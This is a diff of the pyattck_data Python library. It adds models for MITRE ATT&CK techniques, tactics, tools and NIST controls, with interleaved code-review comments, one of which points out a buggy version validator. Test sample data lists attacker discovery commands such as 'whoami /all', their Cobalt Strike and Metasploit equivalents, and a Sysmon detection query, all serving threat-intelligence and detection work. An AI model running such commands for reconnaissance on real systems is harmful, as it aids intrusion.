diff --git a/src/pyattck_data/models/matrix.py b/src/pyattck_data/models/matrix.py
new file mode 100644
index 0000000..adc5d4b
--- /dev/null
+++ b/src/pyattck_data/models/matrix.py
@@ -0,0 +1,33 @@
+from .types import (
+ Id,
+ SemVersion,
+ MitreDomain
+)
+from .base import (
+ BaseModel,
+ ExternalReferences,
+ List,
+ AnyStr,
+ define,
+ field,
+ validators
+)
+
+
+@define
+class Matrix(BaseModel):
+ type: AnyStr = field(validator=validators.in_(['x-mitre-matrix']))
+ tactic_refs: List[Id] = field()
+ created_by_ref: Id = field()
+ description: AnyStr = field()
+ x_mitre_domains: List[MitreDomain] = field(factory=list)
+ object_marking_refs: List[Id] = field(factory=list)
+ external_references: List[ExternalReferences] = field(factory=list)
+
+ # used in pre-attack
+ x_mitre_deprecated: bool = field(factory=bool)
+
+ # NOT used in pre-attack
+ x_mitre_version: SemVersion = field(factory=SemVersion)
+ x_mitre_modified_by_ref: Id = field(factory=Id)
+ x_mitre_attack_spec_version: SemVersion = field(factory=SemVersion)
diff --git a/src/pyattck_data/models/mitigation.py b/src/pyattck_data/models/mitigation.py
new file mode 100644
index 0000000..248bd9b
--- /dev/null
+++ b/src/pyattck_data/models/mitigation.py
@@ -0,0 +1,49 @@ +from .types import ( + Id, + MitreDomain +) +from .base import ( + BaseModel, + ExternalReferences, + List, + AnyStr, + SemVersion, + define, + field, + validators +) + + +@define +class Mitigation(BaseModel): + type: AnyStr = field(validator=validators.in_(['course-of-action'])) + description: AnyStr = field() + created_by_ref: Id = field() + x_mitre_deprecated: bool = field(factory=bool) + object_marking_refs: List[Id] = field(factory=list) + external_references: List[ExternalReferences] = field(factory=list) + + # used in ics-attack + labels: List = field(factory=list) + x_mitre_attack_spec_version: SemVersion = field(factory=SemVersion) + + # used in mobile attack + x_mitre_old_attack_id: AnyStr = field(factory=str) + + # NOT used in mobile attack + x_mitre_modified_by_ref: Id = field(factory=Id) + x_mitre_domains: List[MitreDomain] = field(factory=list) + + def __attrs_post_init__(self): + if self.external_references: + return_list = [] + for item in self.external_references: + return_list.append(ExternalReferences(**item)) + self.external_references = return_list + + @property + def techniques(self): + return self._get_relationship_objects( + parent_id=self.id, + parent_type='attack-pattern' + ) diff --git a/src/pyattck_data/models/nist.py b/src/pyattck_data/models/nist.py new file mode 100644 index 0000000..59e8b9c --- /dev/null +++ b/src/pyattck_data/models/nist.py 
@@ -0,0 +1,74 @@ +from datetime import datetime + +from attrs import validators + +from .types import Id, SemVersion +from .base import ( + List, + AnyStr, + BaseRelationship, + define, + field, + ExternalReferences +) + + +@define +class ControlObject: + id: Id = field() + name: AnyStr = field() + created: datetime = field() + external_references: List[ExternalReferences] = field() + modified: datetime = field() + description: AnyStr = field() + type: AnyStr = field(validator=validators.in_(['course-of-action'])) + x_mitre_family: AnyStr = field() + x_mitre_priority: AnyStr = field(factory=str) + x_mitre_impact: list = field(factory=list) + + +@define +class NistControls: + id: Id = field() + type: Id = field() + objects: List[ControlObject] = field(factory=list) + spec_version: SemVersion = field(factory=SemVersion) + + def __attrs_post_init__(self): + if self.objects: + return_list = [] + for item in self.objects: + if item.get('type') == 'relationship': + try: + return_list.append(BaseRelationship(**item)) + except Exception as e: + raise e + else: + try: + return_list.append(ControlObject(**item)) + except Exception as e: + print(item) + raise e + self.objects = return_list + +@define +class GeneratedNistControlMap: + data: dict = field() + + def __attrs_post_init__(self): + if self.data: + return_dict = {} + for key,val in self.data.items(): + try: + Id().validate(key) + except Exception as e: + raise e + return_dict[key] = [] + if isinstance(val, list): + for item in val: + try: + Id().validate(item) + except Exception as e: + raise e + return_dict[key] = val + self.data = return_dict diff --git a/src/pyattck_data/models/py.typed b/src/pyattck_data/models/py.typed new file mode 100644 index 0000000..e69de29 diff --git a/src/pyattck_data/models/relationship.py b/src/pyattck_data/models/relationship.py new file mode 100644 index 0000000..64ed823 --- /dev/null +++ b/src/pyattck_data/models/relationship.py 
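Review bot: both `except Exception as e: raise e` blocks in `NistControls.__attrs_post_init__` add nothing but an extra traceback frame; drop the `try` around `BaseRelationship(**item)`, and where the record is wanted on failure use a bare `raise` after logging. `print(item)` writes the full control record to stdout on a parse failure; `logging.getLogger(__name__).error("failed to parse control %r", item)` keeps it out of the library's normal output. `ControlObject.external_references` is left as the raw list from the bundle while every other model converts entries to `ExternalReferences`, so attribute access on references will differ between control and ATT&CK objects. In `GeneratedNistControlMap.__attrs_post_init__` a value that is not a list is validated neither as an id nor as a list and is replaced by `[]`; if that is intentional it deserves a comment, otherwise raising is safer.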
@@ -0,0 +1,27 @@
+from .types import (
+ Id,
+ SemVersion
+)
+from .base import (
+ BaseRelationship,
+ ExternalReferences,
+ List,
+ AnyStr,
+ define,
+ field
+)
+
+
+@define
+class Relationship(BaseRelationship):
+ object_marking_refs: List[Id] = field()
+ revoked: bool = field(factory=bool)
+ created_by_ref: Id = field(factory=Id)
+ description: AnyStr = field(factory=str)
+ x_mitre_deprecated: bool = field(factory=bool)
+ x_mitre_version: SemVersion = field(factory=SemVersion)
+ x_mitre_attack_spec_version: SemVersion = field(factory=SemVersion)
+ external_references: List[ExternalReferences] = field(factory=list)
+
+ # NOT used by pre-attack
+ x_mitre_modified_by_ref: Id = field(factory=Id)
diff --git a/src/pyattck_data/models/tactic.py b/src/pyattck_data/models/tactic.py
new file mode 100644
index 0000000..429d414
--- /dev/null
+++ b/src/pyattck_data/models/tactic.py
@@ -0,0 +1,53 @@ +from math import factorial +from .types import ( + Id, + SemVersion +) +from .base import ( + BASE_OBJECTS, + BaseModel, + ExternalReferences, + List, + AnyStr, + define, + field, + validators +) + + +@define +class Tactic(BaseModel): + type: AnyStr = field(validator=validators.in_(['x-mitre-tactic'])) + description: AnyStr = field() + created_by_ref: Id = field() + x_mitre_shortname: AnyStr = field() + object_marking_refs: List[Id] = field(factory=list) + external_references: List[ExternalReferences] = field(factory=list) + x_mitre_contributors: List = field(factory=list) + + # used in ics-attack + x_mitre_deprecated: bool = field(factory=bool) + revoked: bool = field(factory=bool) + + # NOT used in pre-attack + x_mitre_version: SemVersion = field(factory=SemVersion) + x_mitre_domains: List = field(factory=list) + x_mitre_modified_by_ref: Id = field(factory=Id) + x_mitre_attack_spec_version: SemVersion = field(factory=SemVersion) + + def __attrs_post_init__(self): + if self.external_references: + return_list = [] + for item in self.external_references: + return_list.append(ExternalReferences(**item)) + self.external_references = return_list + + @property + def techniques(self): + return_list = [] + for object in BASE_OBJECTS: + if hasattr(object, 'kill_chain_phases'): + for prop in object.kill_chain_phases: + if prop.phase_name.lower() == self.x_mitre_shortname.lower(): + return_list.append(object) + return return_list diff --git a/src/pyattck_data/models/technique.py b/src/pyattck_data/models/technique.py new file mode 100644 index 0000000..7e8ee96 --- /dev/null +++ b/src/pyattck_data/models/technique.py 
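Review bot: `Tactic.techniques` matches on `phase_name` alone and ignores `kill_chain_name`, so a short name shared by two frameworks loaded into `BASE_OBJECTS` would return techniques from the other framework; the comparison should also constrain `prop.kill_chain_name` (or filter by the tactic's `x_mitre_domains`). `prop.phase_name` assumes the entries are `KillChainPhases` objects, but technique.py declares `kill_chain_phases: List[KillChainPhases] = field(factory=list)` with no converter visible in this commit, so entries may still be dicts and raise `AttributeError`. `from math import factorial` is unused, and the loop variable `object` shadows the builtin; `for obj in BASE_OBJECTS:` reads better.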
@@ -0,0 +1,156 @@ +from .types import ( + Id, + SemVersion, + MitreDomain, + MitrePlatform +) +from .base import ( + BaseModel, + ExternalReferences, + List, + AnyStr, + define, + field, + validators +) + + +@define +class Command: + source: AnyStr = field(factory=str) + command: AnyStr = field(factory=str) + name: AnyStr = field(factory=str) + + +@define +class KillChainPhases: + kill_chain_name: AnyStr = field() + phase_name: AnyStr = field() + + +@define +class Technique(BaseModel): + type: AnyStr = field(validator=validators.in_(['attack-pattern'])) + + x_mitre_data_sources: List = field(factory=list) + x_mitre_contributors: List = field(factory=list) + x_mitre_impact_type: List = field(factory=list) + x_mitre_deprecated: bool = field(factory=bool) + x_mitre_effective_permissions: List = field(factory=list) + x_mitre_remote_support: bool = field(factory=bool) + x_mitre_permissions_required: List = field(factory=list) + x_mitre_is_subtechnique: bool = field(factory=bool) + x_mitre_detection: AnyStr = field(factory=str) + x_mitre_defense_bypassed: List = field(factory=list) + x_mitre_system_requirements: List = field(factory=list) + x_mitre_attack_spec_version: SemVersion = field(factory=SemVersion) + revoked: bool = field(factory=bool) + object_marking_refs: List[Id] = field(factory=list) + external_references: List[ExternalReferences] = field(factory=list) + + # used in pre-attack + x_mitre_detectable_by_common_defenses: AnyStr = field(factory=str) + x_mitre_detectable_by_common_defenses_explanation: AnyStr = field(factory=str) + x_mitre_difficulty_for_adversary: AnyStr = field(factory=str) + x_mitre_difficulty_for_adversary_explanation: AnyStr = field(factory=str) + x_mitre_old_attack_id: AnyStr = field(factory=str) + + # these are NOT used by pre-attack but used by other frameworks + x_mitre_modified_by_ref: Id = field(factory=Id) + x_mitre_platforms: List[MitrePlatform] = field(factory=list) + x_mitre_domains: List[MitreDomain] = field(factory=list) + + # 
used in mobile framework + x_mitre_tactic_type: List = field(factory=list) + + # NOT used in mobile framework + x_mitre_version: SemVersion = field(factory=SemVersion) + description: AnyStr = field(factory=str) + created_by_ref: Id = field(factory=Id) + kill_chain_phases: List[KillChainPhases] = field(factory=list) + + command_list: List = field(factory=list) + commands: List[Command] = field(factory=list) # need to define this object better + queries: List = field(factory=list) # need to define this object better + parsed_datasets: List = field(factory=list) # need to define this object better + possible_detections: List = field(factory=list) # need to define this object better + external_reference: List = field(factory=list) + + controls: List = field(factory=list) + + @property + def actors(self): + return self._get_relationship_objects( + parent_id=self.id, + parent_type='intrusion-set' + ) + + @property + def data_components(self): + return self._get_relationship_objects( + parent_id=self.id, + parent_type='x-mitre-data-component' + ) + + @property + def data_sources(self): + return self._get_relationship_objects( + parent_id=self.id, + parent_type='x-mitre-data-source' + ) + + @property + def malwares(self): + return self._get_relationship_objects( + parent_id=self.id, + parent_type='malware' + ) + + @property + def mitigations(self): + return self._get_relationship_objects( + parent_id=self.id, + parent_type='course-of-action' + ) + + @property + def tactics(self): + return self._get_relationship_objects( + parent_id=self.id, + parent_type='x-mitre-tactic' + ) + + @property + def techniques(self): + return self._get_relationship_objects( + parent_id=self.id, + parent_type='attack-pattern' + ) + + @property + def tools(self): + return self._get_relationship_objects( + parent_id=self.id, + parent_type='tool' + ) + + def __attrs_post_init__(self): + if self.controls: + from .control import Control + return_list = [] + for item in self.controls: + try: + 
return_list.append(Control(**item)) + except ValueError as ve: + raise ve + self.controls = return_list + if self.external_references: + return_list = [] + for item in self.external_references: + return_list.append(ExternalReferences(**item)) + self.external_references = return_list + if self.kill_chain_phases: + return_list = [] + for item in self.kill_chain_phases: + return_list.append(KillChainPhases(**item)) + self.kill_chain_phases = return_list diff --git a/src/pyattck_data/models/tool.py b/src/pyattck_data/models/tool.py new file mode 100644 index 0000000..3029d9a --- /dev/null +++ b/src/pyattck_data/models/tool.py 
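Review bot: The `try: return_list.append(Control(**item)) except ValueError as ve: raise ve` in `Technique.__attrs_post_init__` is a no-op — it re-raises the same exception unchanged — so it should either go, or add the context that makes a failed dataset load debuggable, e.g. `raise ValueError(f"Invalid control on technique {self.id}: {item!r}") from ve`. The three conversion loops (`controls`, `external_references`, `kill_chain_phases`) assume every entry is a dict; an already-converted instance fails on `**item`, so an `isinstance(item, dict)` guard is worth adding if these models are ever rebuilt from `asdict()` output. The function-local `from .control import Control` looks like a circular-import workaround and deserves a comment saying so.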
@@ -0,0 +1,125 @@ +from .types import ( + Id, + SemVersion, + MitreDomain, + MitrePlatform +) +from .base import ( + BaseModel, + ExternalReferences, + List, + AnyStr, + define, + field, + validators +) + + +@define +class Tool(BaseModel): + type: AnyStr = field(validator=validators.in_(['tool'])) + description: AnyStr = field() + created_by_ref: Id = field() + labels: List = field() + + x_mitre_platforms: List[MitrePlatform] = field(factory=list) + x_mitre_aliases: List = field(factory=list) + x_mitre_contributors: List = field(factory=list) + external_references: List[ExternalReferences] = field(factory=list) + object_marking_refs: List[Id] = field(factory=list) + revoked: bool = field(factory=bool) + x_mitre_deprecated: bool = field(factory=bool) + + # External collected data properties (if applicable) + c2_data: dict = field(factory=dict) + external_dataset: List = field(factory=list) # need to define this object better + additional_names: List = field(factory=list) + attribution_links: List = field(factory=list) + additional_comments: List = field(factory=list) + names: List = field(factory=list) + comments: List = field(factory=list) + family: List = field(factory=list) + links: List = field(factory=list) + license: AnyStr = field(factory=str) + price: AnyStr = field(factory=str) + github: AnyStr = field(factory=str) + site: AnyStr = field(factory=str) + twitter: AnyStr = field(factory=str) + evaluator: AnyStr = field(factory=str) + date: AnyStr = field(factory=str) + version: int = field(factory=int) + implementation: AnyStr = field(factory=str) + how_to: AnyStr = field(factory=str) + slingshot: AnyStr = field(factory=str) + kali: AnyStr = field(factory=str) + server: AnyStr = field(factory=str) + implant: AnyStr = field(factory=str) + multi_user: bool = field(factory=bool) + ui: bool = field(factory=bool) + dark_mode: bool = field(factory=bool) + api: bool = field(factory=bool) + windows: bool = field(factory=bool) + linux: bool = field(factory=bool) + 
macos: bool = field(factory=bool) + tcp: bool = field(factory=bool) + http: bool = field(factory=bool) + http2: bool = field(factory=bool) + http3: bool = field(factory=bool) + dns: bool = field(factory=bool) + doh: bool = field(factory=bool) + icmp: bool = field(factory=bool) + ftp: bool = field(factory=bool) + imap: bool = field(factory=bool) + mapi: bool = field(factory=bool) + smb: bool = field(factory=bool) + ldap: bool = field(factory=bool) + key_exchange: bool = field(factory=bool) + stego: bool = field(factory=bool) + proxy_aware: bool = field(factory=bool) + domainfront: bool = field(factory=bool) + custom_profile: bool = field(factory=bool) + jitter: bool = field(factory=bool) + working_hours: bool = field(factory=bool) + kill_date: bool = field(factory=bool) + chaining: bool = field(factory=bool) + logging: bool = field(factory=bool) + in_wild: bool = field(factory=bool) + attck_mapping: bool = field(factory=bool) + dashboard: bool = field(factory=bool) + blog: AnyStr = field(factory=str) + c2_matrix_indicators: AnyStr = field(factory=str) + jarm: bool = field(factory=bool) + actively_maint: bool = field(factory=bool) + slack: bool = field(factory=bool) + slack_members: bool = field(factory=bool) + gh_issues: bool = field(factory=bool) + notes: AnyStr = field(factory=str) + + # used in mobile attack + x_mitre_old_attack_id: AnyStr = field(factory=str) + + # NOT used in mobile attack + x_mitre_attack_spec_version: SemVersion = field(factory=SemVersion) + x_mitre_modified_by_ref: Id = field(factory=Id) + x_mitre_domains: List[MitreDomain] = field(factory=list) + + def __attrs_post_init__(self): + if self.external_references: + return_list = [] + for item in self.external_references: + return_list.append(ExternalReferences(**item)) + self.external_references = return_list + + @property + def actors(self): + return self._get_relationship_objects( + parent_id=self.id, + parent_type='intrusion-set' + ) + + @property + def techniques(self): + return 
self._get_relationship_objects( + parent_id=self.id, + parent_type='attack-pattern' + ) diff --git a/src/pyattck_data/models/types.py b/src/pyattck_data/models/types.py new file mode 100644 index 0000000..d84939c --- /dev/null +++ b/src/pyattck_data/models/types.py 
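Review bot: The `bool`-annotated C2 Matrix fields on `Tool` (`multi_user`, `windows`, `tcp`, … `gh_issues`) have no converter, and attrs does not coerce on its own; if they are populated from rows like the test data in this patch (`"windows": "Yes"`, `"multi_user": "No"`), the string is stored verbatim and `"No"` is truthy in any `if tool.windows:` check. A shared converter would make the annotation real, e.g. `def _yes_no(v): return v if isinstance(v, bool) else str(v).strip().lower() in ("yes", "true", "1")` applied as `windows: bool = field(factory=bool, converter=_yes_no)`. `version: int = field(factory=int)` has the same mismatch against the string `"4"` in that data. The hunk does not show where these fields are filled, so confirm against the C2 Matrix loader before changing.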
@@ -0,0 +1,165 @@ +import re +from pydantic import BaseModel + + +# https://ihateregex.io/expr/semver/ + +PATTERNS = { + 'semversion': { + 'pattern': "^(0|[1-9]\d*)\.(0|[1-9]\d*)\.(0|[1-9]\d*)(?:-((?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\.(?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\+([0-9a-zA-Z-]+(?:\.[0-9a-zA-Z-]+)*))?$", + 'examples': ['1.1.1', '0.1.2', '99.99.99'] + }, + 'types': { + 'pattern': None, + 'examples': ['relationship', 'x-mitre-matrix', 'identity', 'marking-definition', 'course-of-action', 'malware', 'tool', 'intrusion-set', 'x-mitre-data-source', 'x-mitre-data-component', 'x-mitre-tactic', 'attack-pattern', 'bundle'] + }, + 'reference': { + 'pattern': None, + 'examples': ['identity', 'marking-definition', 'course-of-action', 'malware', 'tool', 'intrusion-set', 'x-mitre-data-source', 'x-mitre-data-component', 'x-mitre-tactic', 'attack-pattern'] + }, + 'domains': { + 'pattern': None, + 'examples': ['mobile-attack', 'enterprise-attack'] + }, + 'platforms': { + 'pattern': None, + 'examples': ['Windows', 'Android', 'iOS', 'macOS', 'Azure AD', 'SaaS', 'Network', 'Google Workspace', 'PRE', 'Containers', 'IaaS', 'Linux', 'Office 365'] + }, + 'relationship': { + 'pattern': None, + 'examples': ['revoked-by', 'subtechnique-of', 'uses', 'detects', 'mitigates','related-to'] + } +} + + +REGEXS = { + 'semversion': re.compile(PATTERNS['semversion']['pattern']) +} + + +class BaseCustomType(str): + + @classmethod + def __get_validators__(cls): + # one or more validators may be yielded which will be called in the + # order to validate the input, each validator will receive as an input + # the value returned from the previous validator + yield cls.validate + + +class SemVersion(BaseCustomType): + + @classmethod + def __modify_schema__(cls, field_schema): + # __modify_schema__ should mutate the dict it receives in place, + # the returned value will be ignored + field_schema.update( + # simplified regex here for brevity, see the wikipedia link above + 
pattern=PATTERNS['semversion']['pattern'], + # some example postcodes + examples=PATTERNS['semversion']['examples'], + ) + + @classmethod + def validate(cls, v): + if not isinstance(v, str): + raise TypeError('string required') + m = REGEXS['semversion'].fullmatch(v.upper()) + if not m: + raise ValueError('Invalid SemVersion format') + return cls(f'{m.group(1)} {m.group(2)}') + + def __repr__(self): + return f'SemVersion({super().__repr__()})' + + +class Id(BaseCustomType): + + @classmethod + def __modify_schema__(cls, field_schema): + # __modify_schema__ should mutate the dict it receives in place, + # the returned value will be ignored + field_schema.update( + examples=PATTERNS['types']['examples'], + ) + + @classmethod + def validate(cls, v): + if not isinstance(v, str): + raise TypeError('string required') + if '--' in v: + type,id = v.split('--') + else: + type = v + if type not in PATTERNS['types']['examples']: + raise ValueError('Invalid Id attribute.') + return cls(v) + + def __repr__(self): + return f'Id({super().__repr__()})' + + +class MitreDomain(BaseCustomType): + + @classmethod + def __modify_schema__(cls, field_schema): + # __modify_schema__ should mutate the dict it receives in place, + # the returned value will be ignored + field_schema.update( + examples=PATTERNS['domains']['examples'], + ) + + @classmethod + def validate(cls, v): + if not isinstance(v, str): + raise TypeError('string required') + if v not in PATTERNS['domains']['examples']: + raise ValueError('Invalid MitreDomain attribute.') + return cls(v) + + def __repr__(self): + return f'MitreDomain({super().__repr__()})' + + +class MitrePlatform(BaseCustomType): + + @classmethod + def __modify_schema__(cls, field_schema): + # __modify_schema__ should mutate the dict it receives in place, + # the returned value will be ignored + field_schema.update( + examples=PATTERNS['platforms']['examples'], + ) + + @classmethod + def validate(cls, v): + if not isinstance(v, str): + raise 
TypeError('string required') + if v not in PATTERNS['platforms']['examples']: + raise ValueError('Invalid MitrePlatform attribute.') + return cls(v) + + def __repr__(self): + return f'MitrePlatform({super().__repr__()})' + + +class MitreRelationship(BaseCustomType): + + @classmethod + def __modify_schema__(cls, field_schema): + # __modify_schema__ should mutate the dict it receives in place, + # the returned value will be ignored + field_schema.update( + examples=PATTERNS['relationship']['examples'], + ) + + @classmethod + def validate(cls, v): + if not isinstance(v, str): + raise TypeError('string required') + if v not in PATTERNS['relationship']['examples']: + raise ValueError('Invalid MitreRelationship attribute.') + return cls(v) + + def __repr__(self): + return f'MitreRelationship({super().__repr__()})' diff --git a/pyattck_data/pyattckdata.py b/src/pyattck_data/pyattckdata.py similarity index 100% rename from pyattck_data/pyattckdata.py rename to src/pyattck_data/pyattckdata.py index bade133..35981af 100644 --- a/pyattck_data/pyattckdata.py +++ b/src/pyattck_data/pyattckdata.py @@ -1,7 +1,7 @@ import json import os -from requests import request +from requests import request from attrs import asdict from .base import Base diff --git a/pyattck_data/services/__init__.py b/src/pyattck_data/services/__init__.py similarity index 100% rename from pyattck_data/services/__init__.py rename to src/pyattck_data/services/__init__.py diff --git a/pyattck_data/services/adversaryemulation.py b/src/pyattck_data/services/adversaryemulation.py similarity index 100% rename from pyattck_data/services/adversaryemulation.py rename to src/pyattck_data/services/adversaryemulation.py diff --git a/pyattck_data/services/aptthreattracking.py b/src/pyattck_data/services/aptthreattracking.py similarity index 99% rename from pyattck_data/services/aptthreattracking.py rename to src/pyattck_data/services/aptthreattracking.py index a802bb1..0c84e45 100644 
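Review bot: `SemVersion.validate` returns `cls(f'{m.group(1)} {m.group(2)}')`, which rewrites a valid `1.2.3` into `'1 2'` — the patch component is dropped and the separator changes, so the stored value no longer matches the pattern it was just checked against; it should be `return cls(v)` (the `.upper()` is also unnecessary, the pattern already admits both cases). The `semversion` pattern is a plain string containing `\d`, which emits a DeprecationWarning (SyntaxWarning on 3.12+); make it a raw string `r"^(0|[1-9]\d*)…"`. In `Id.validate`, `type,id = v.split('--')` raises an unhandled `ValueError: too many values to unpack` on input with more than one `--`, and the identifier half is never checked, so `attack-pattern--anything` is accepted; `type_, _, ident = v.partition('--')` plus a `uuid.UUID(ident)` check when `ident` is non-empty would reject malformed STIX ids before they are used as relationship keys.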
--- a/pyattck_data/services/aptthreattracking.py +++ b/src/pyattck_data/services/aptthreattracking.py @@ -148,7 +148,7 @@ def __parse_data(self, country, dict_list): targets=target, operations=operations, description=description, - tools=tools, + external_tools=tools, links=links, attck_id=attck_id, comment=comment diff --git a/pyattck_data/services/atomicredteam.py b/src/pyattck_data/services/atomicredteam.py similarity index 100% rename from pyattck_data/services/atomicredteam.py rename to src/pyattck_data/services/atomicredteam.py diff --git a/pyattck_data/services/atomicthreatcoverage.py b/src/pyattck_data/services/atomicthreatcoverage.py similarity index 100% rename from pyattck_data/services/atomicthreatcoverage.py rename to src/pyattck_data/services/atomicthreatcoverage.py diff --git a/pyattck_data/services/attckdatasources.py b/src/pyattck_data/services/attckdatasources.py similarity index 100% rename from pyattck_data/services/attckdatasources.py rename to src/pyattck_data/services/attckdatasources.py diff --git a/pyattck_data/services/attckempire.py b/src/pyattck_data/services/attckempire.py similarity index 100% rename from pyattck_data/services/attckempire.py rename to src/pyattck_data/services/attckempire.py diff --git a/pyattck_data/services/blueteamlabs.py b/src/pyattck_data/services/blueteamlabs.py similarity index 100% rename from pyattck_data/services/blueteamlabs.py rename to src/pyattck_data/services/blueteamlabs.py diff --git a/pyattck_data/services/c2matrix.py b/src/pyattck_data/services/c2matrix.py similarity index 100% rename from pyattck_data/services/c2matrix.py rename to src/pyattck_data/services/c2matrix.py diff --git a/pyattck_data/services/elemental.py b/src/pyattck_data/services/elemental.py similarity index 100% rename from pyattck_data/services/elemental.py rename to src/pyattck_data/services/elemental.py 
diff --git a/pyattck_data/services/litmustest.py b/src/pyattck_data/services/litmustest.py similarity index 100% rename from pyattck_data/services/litmustest.py rename to src/pyattck_data/services/litmustest.py diff --git a/pyattck_data/services/macosattackdataset.py b/src/pyattck_data/services/macosattackdataset.py similarity index 100% rename from pyattck_data/services/macosattackdataset.py rename to src/pyattck_data/services/macosattackdataset.py diff --git a/pyattck_data/services/malwarearchaeology.py b/src/pyattck_data/services/malwarearchaeology.py similarity index 100% rename from pyattck_data/services/malwarearchaeology.py rename to src/pyattck_data/services/malwarearchaeology.py diff --git a/pyattck_data/services/newbeeattackdata.py b/src/pyattck_data/services/newbeeattackdata.py similarity index 100% rename from pyattck_data/services/newbeeattackdata.py rename to src/pyattck_data/services/newbeeattackdata.py diff --git a/pyattck_data/services/nsmattck.py b/src/pyattck_data/services/nsmattck.py similarity index 100% rename from pyattck_data/services/nsmattck.py rename to src/pyattck_data/services/nsmattck.py diff --git a/pyattck_data/services/osqueryattack.py b/src/pyattck_data/services/osqueryattack.py similarity index 100% rename from pyattck_data/services/osqueryattack.py rename to src/pyattck_data/services/osqueryattack.py diff --git a/pyattck_data/services/stockpile.py b/src/pyattck_data/services/stockpile.py similarity index 100% rename from pyattck_data/services/stockpile.py rename to src/pyattck_data/services/stockpile.py diff --git a/pyattck_data/services/sysmonhunter.py b/src/pyattck_data/services/sysmonhunter.py similarity index 100% rename from pyattck_data/services/sysmonhunter.py rename to src/pyattck_data/services/sysmonhunter.py 
diff --git a/pyattck_data/services/threathuntingbook.py b/src/pyattck_data/services/threathuntingbook.py similarity index 100% rename from pyattck_data/services/threathuntingbook.py rename to src/pyattck_data/services/threathuntingbook.py diff --git a/pyattck_data/services/threathuntingtables.py b/src/pyattck_data/services/threathuntingtables.py similarity index 100% rename from pyattck_data/services/threathuntingtables.py rename to src/pyattck_data/services/threathuntingtables.py diff --git a/tests/__init__.py b/tests/__init__.py new file mode 100644 index 0000000..c13c51f --- /dev/null +++ b/tests/__init__.py @@ -0,0 +1 @@ +"""Test suite for the pyattck_data package.""" diff --git a/tests/test_each_model.py b/tests/test_each_model.py new file mode 100644 index 0000000..22cc4df --- /dev/null +++ b/tests/test_each_model.py 
@@ -0,0 +1,53 @@ +from pyattck_data.models.attack import MitreAttck, TYPE_MAP +from pyattck_data.models.nist import NistControls, GeneratedNistControlMap, ControlObject, BaseRelationship + + +data = None + +import requests + +def test_each_model(): + default_config_data = { + "enterprise_attck_json": "https://swimlane-pyattck.s3.us-west-2.amazonaws.com/merged_enterprise_attck_v1.json", + "pre_attck_json": "https://swimlane-pyattck.s3.us-west-2.amazonaws.com/merged_pre_attck_v1.json", + "mobile_attck_json": "https://swimlane-pyattck.s3.us-west-2.amazonaws.com/merged_mobile_attck_v1.json", + "ics_attck_json": "https://swimlane-pyattck.s3.us-west-2.amazonaws.com/merged_ics_attck_v1.json", + "nist_controls_json": "https://swimlane-pyattck.s3.us-west-2.amazonaws.com/merged_nist_controls_v1.json", + "generated_nist_json": "https://swimlane-pyattck.s3.us-west-2.amazonaws.com/attck_to_nist_controls.json", + } + for key,val in default_config_data.items(): + response = requests.get(val).json() + skip = False + if key == 'nist_controls_json': + data = NistControls(**response) + elif key == 'generated_nist_json': + data = GeneratedNistControlMap(**{"data": response}) + skip = True + else: + data = MitreAttck(**response) + if not skip: + for item in response['objects']: + if item.get('type'): + if key == 'nist_controls_json': + if item['type'] == 'relationship': + try: + BaseRelationship(**item) + except TypeError as te: + print(item) + print(te) + assert False + else: + try: + ControlObject(**item) + except TypeError as te: + print(item) + print(te) + assert False + else: + if TYPE_MAP.get(item['type']): + try: + TYPE_MAP[item['type']](**item) + except TypeError as te: + print(item) + print(te) + assert False diff --git a/tests/test_generated_methods.py b/tests/test_generated_methods.py new file mode 100644 index 0000000..6758a40 --- /dev/null +++ b/tests/test_generated_methods.py 
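Review bot: Each iteration of `test_each_model` does `requests.get(val).json()` with no timeout and no status check, so an S3 outage hangs the suite indefinitely and a 403/404 body surfaces as an opaque JSON decode error; use `resp = requests.get(val, timeout=30)`, `resp.raise_for_status()`, `response = resp.json()`. The `except TypeError` branches also miss `ValueError`, which is what attrs `validators.in_` on the models' `type` fields raises, so those failures escape without the `print(item)` context that makes them debuggable — catch `(TypeError, ValueError)`. `pytest.fail(...)` reads better than `assert False`, and the module-level `data = None` is unused.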
@@ -0,0 +1,264 @@ +import json + +from pyattck_data.models.generated import GeneratedData + + +GENERATED_ATTCK_JSON = json.load(open("tests/resources/generated_attck_data.json")) + +SAMPLE_DATA = { + "country": "china", + "names": ["APT1"], + "targets": ["USA"], + "operations": ["Some overseas operation"], + "description": "my description", + "tools": ["PowerShell", "Python"], + "links": ["https://google.com"], + "attck_id": "T1009", + "comment": "Some comment", + "family": ["USA"], + "names": ["PowerShell", "Python"], + "links": ["https://google.com"], + "comments": "Some comment", + "technique_id": "T1009", + "source": "https://google.com", + "name": "", + "command": "shell ver", + "content": { + "Category": "T1033", + "Built-in Windows Command": "whoami /all /fo list", + "Cobalt Strike": "shell whoami /all /fo list", + "Metasploit": "getuid", + "Description": "Get current user information, SID, domain, groups the user belongs to, security privs of the user" + }, + "product": "Azure Sentinel", + "content": "Sysmon| where EventID == 1 and (process_path contains \"whoami.exe\"or process_command_line contains \"whoami\"or file_directory contains \"useraccount get /ALL\"or process_path contains \"qwinsta.exe\"or process_path contains \"quser.exe\"or process_path contains \"systeminfo.exe\")", + "name": "System Owner User Discovery", + "data": { + "title": "System Owner or User Discovery", + "id": "9a0d8ca0-2385-4020-b6c6-cb6153ca56f3", + "status": "experimental", + "description": "Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.", + "author": "Timur Zinniatullin, oscd.community", + "date": "2019/10/21", + "references": [ + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.yaml" + ], + "logsource": { + "product": "linux", + "service": "auditd" + }, + "detection": { + 
